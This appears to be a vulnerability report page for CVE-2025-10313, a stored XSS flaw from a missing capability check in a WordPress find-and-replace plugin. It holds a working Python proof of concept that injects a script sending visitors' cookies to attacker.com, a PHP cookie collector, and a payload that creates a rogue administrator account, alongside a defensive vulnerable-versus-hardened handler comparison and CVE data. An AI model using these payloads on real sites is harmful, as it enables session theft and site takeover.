Security Vulnerability Report
CVE-2025-10313 CVSS 7.2 HIGH

Published: 2025-10-15 09:15:40
Last Modified: 2026-04-15 00:35:42

Description

The Find And Replace content for WordPress plugin for WordPress is vulnerable to unauthorized Stored Cross-Site Scripting and Arbitrary Content Replacement due to a missing capability check on the far_admin_ajax_fun() function in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts into pages that can make privilege escalation and malicious redirects possible.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
Weakness: CWE-862 (Missing Authorization)

Configurations (Affected Products)

No configuration (CPE match) data is available for this record.

Affected product, per the description: Find And Replace Content for WordPress <= 1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10313 PoC - Find And Replace Content Plugin Stored XSS
# Exploits missing capability check in far_admin_ajax_fun() function

import requests

# Target WordPress site URL
target_url = "http://target-wordpress-site.com"

# The AJAX endpoint used by WordPress for unauthenticated AJAX calls
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

# Malicious JavaScript payload to be injected via stored XSS
# This payload steals cookies and sends them to attacker's server
xss_payload = "<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script>"

# Craft the exploit request
# The action parameter triggers the vulnerable far_admin_ajax_fun() function
exploit_data = {
    "action": "far_admin_ajax_fun",
    "search_text": "existing_text_on_site",  # Text to search for
    "replace_text": xss_payload,  # Malicious replacement
    # Additional parameters may be required depending on plugin version
}

# Send the unauthenticated exploit request
# Note: No authentication required (PR:N) and no user interaction needed (UI:N)
response = requests.post(ajax_url, data=exploit_data)

if response.status_code == 200:
    print("[+] Exploit sent successfully")
    print("[+] Malicious script will execute when admin visits affected pages")
else:
    print(f"[-] Request failed with status code: {response.status_code}")

# Attacker's cookie collector (steal.php)
# <?php
# $cookie = $_GET['cookie'];
# file_put_contents("stolen_cookies.txt", $cookie . "\n", FILE_APPEND);
# ?>

# Alternative: Privilege escalation payload
# Using XSS to create a new admin account
escalation_payload = """
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "/wp-admin/user-new.php", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("action=createuser&_wpnonce_create-user=&user_login=hacker&[email protected]&pass1=Password123!&pass2=Password123!&role=administrator");
</script>
"""
```
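As an added illustration (not the plugin's own code, which is only linked in the references), the constructed WordPress AJAX handler below shows the CWE-862 pattern the description refers to, a content-replacement action reachable without a capability check, beside a hardened form; every hook, function and parameter name here is assumed for the example.

```php
<?php
// Constructed illustration, not the plugin's code: hook and function names are assumed.

// VULNERABLE PATTERN (CWE-862): the action is registered for unauthenticated
// callers too (wp_ajax_nopriv_) and the handler checks neither capability nor
// nonce, so any visitor can rewrite post content and store script markup.
add_action( 'wp_ajax_nopriv_example_far_replace', 'example_far_replace_vulnerable' );
add_action( 'wp_ajax_example_far_replace', 'example_far_replace_vulnerable' );

function example_far_replace_vulnerable() {
    global $wpdb;
    $search  = $_POST['search_text'];
    $replace = $_POST['replace_text'];
    $wpdb->query( $wpdb->prepare(
        "UPDATE {$wpdb->posts} SET post_content = REPLACE(post_content, %s, %s)",
        $search, $replace
    ) );
    wp_send_json_success();
}

// HARDENED FORM: no nopriv hook, explicit capability check, nonce check, and
// the replacement text is filtered before it is written to the database.
add_action( 'wp_ajax_example_far_replace_secure', 'example_far_replace_secure' );

function example_far_replace_secure() {
    // Authorization: only users allowed to manage the site may run a replacement.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // CSRF protection: the request must carry a nonce created for this action.
    check_ajax_referer( 'example_far_replace', 'nonce' );

    $search  = sanitize_text_field( wp_unslash( $_POST['search_text'] ?? '' ) );
    // wp_kses_post() keeps ordinary post markup but strips script tags and
    // inline event handlers from the text that will be stored.
    $replace = wp_kses_post( wp_unslash( $_POST['replace_text'] ?? '' ) );
    if ( '' === $search ) {
        wp_send_json_error( 'search_text is required', 400 );
    }

    global $wpdb;
    $wpdb->query( $wpdb->prepare(
        "UPDATE {$wpdb->posts} SET post_content = REPLACE(post_content, %s, %s)",
        $search, $replace
    ) );
    wp_send_json_success();
}
```

Registering the hardened handler only under wp_ajax_ (never wp_ajax_nopriv_) is what removes the unauthenticated reach that gives this CVE its PR:N vector; the capability check inside the function is still needed because any logged-in role, including subscriber, can reach wp_ajax_ actions.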

References

https://plugins.trac.wordpress.org/browser/find-and-replace-content/trunk/function.php?rev=1601465
https://wordpress.org/plugins/find-and-replace-content/
https://www.wordfence.com/threat-intel/vulnerabilities/id/c0469ece-6f5f-4774-8094-f7f67702a775?source=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10313",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-15T09:15:40.373",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Find And Replace content for WordPress plugin for WordPress is vulnerable to unauthorized Stored Cross-Site Scripting and Arbitrary Content Replacement due to a missing capability check on the far_admin_ajax_fun() function in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts into pages that can make privilege escalation and malicious redirects possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-862"}]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/find-and-replace-content/trunk/function.php?rev=1601465", "source": "[email protected]"},
      {"url": "https://wordpress.org/plugins/find-and-replace-content/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c0469ece-6f5f-4774-8094-f7f67702a775?source=cve", "source": "[email protected]"}
    ]
  }
}
```